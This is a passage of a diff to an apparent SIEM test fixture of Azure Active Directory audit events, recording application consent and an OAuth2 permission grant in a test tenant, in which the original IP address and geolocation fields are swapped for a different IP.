application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10714,25 +9796,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10746,7 +9810,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10885,7 +9949,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -10897,12 +9961,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036395200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\
\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] 
=\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125140500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -10928,25 +9992,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -10960,7 +10006,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -11096,7 +10142,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -11108,12 +10154,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036399500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\"
:\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103
-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + 
"ingested": "2021-12-09T13:41:51.125147200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add 